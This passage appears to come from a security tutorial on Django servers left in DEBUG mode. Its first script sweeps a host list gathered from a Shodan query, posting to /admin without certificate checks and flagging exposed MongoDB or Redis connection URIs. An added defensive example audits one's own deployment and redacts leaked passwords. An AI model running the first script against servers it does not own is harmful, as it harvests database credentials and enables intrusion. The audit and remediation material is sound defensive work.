    # Read back the list written by the previous script ("r", not "w",
    # which would truncate the file before it is read).
    django_debug_list = open("django-debug-list.txt", "r")
    regex = r"(?:mongodb|redis):\/\/"

    for ip in django_debug_list.readlines():
        try:
            response = requests.post(url=ip.rstrip("\n") + "/admin", data={}, verify=False)
            # response.text is a str, so it can be searched with a str pattern.
            if re.search(regex, response.text):
                print("Mongodb/Redis URI Found")
        except Exception as e:
            print(e)

    django_debug_list.close()

Here you can see a regex that matches mongodb:// or redis:// or both. The rstrip function removes characters from the right end of a string; here I removed the newline (\n) character. I passed the parameter verify=False, which tells the program not to verify the server's SSL certificate. You can use your own regex to match something other than a MongoDB/Redis URI.
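The same marker and regex can be turned on your own deployment, for example in a CI step that fetches a page from staging and fails the build if the debug page is reachable. This is an added example, not code from the original post; `audit_body`, `redact`, the sample body and the host names in it are constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit

# Text of Django's DEBUG=True "page not found" page; the Shodan query above keys on it.
DEBUG_MARKER = "URLconf defined"
# Same schemes as the regex above, extended to capture the whole URI for redaction.
URI_RE = re.compile(r"(?:mongodb|redis)://[^\s\"'<>]+")

# Constructed, simplified debug-page fragment (not captured from any real host).
SAMPLE_BODY = (
    "<p>Using the URLconf defined in <code>shop.urls</code>, Django tried...</p>"
    "<tr><td>MONGO_URI</td><td><pre>"
    "&#x27;mongodb://app:s3cret@db.internal:27017/prod&#x27;</pre></td></tr>"
    "<tr><td>CACHE_URL</td><td><pre>"
    "&#x27;redis://cache.internal:6379/0&#x27;</pre></td></tr>"
)

def redact(uri):
    """Mask the password in a connection URI so the finding can be logged."""
    parts = urlsplit(uri)
    if parts.password is None:
        return uri
    try:
        port = f":{parts.port}" if parts.port else ""
    except ValueError:  # non-numeric port in scraped text
        port = ""
    return f"{parts.scheme}://{parts.username}:***@{parts.hostname}{port}{parts.path}"

def audit_body(body):
    """Check one response body from your own deployment for debug-page leaks."""
    text = html.unescape(body)  # the debug page HTML-escapes the quotes around values
    uris = URI_RE.findall(text)
    return {
        "debug_page": DEBUG_MARKER in text,
        "leaked_uris": [redact(u) for u in uris],
        "with_credentials": sum(urlsplit(u).password is not None for u in uris),
    }

if __name__ == "__main__":
    print(audit_body(SAMPLE_BODY))
```

A result with `debug_page` set or a non-empty `leaked_uris` means the application is serving Django debug output; setting `DEBUG = False` in the deployed settings removes these pages, and any credential that appeared in one should be rotated.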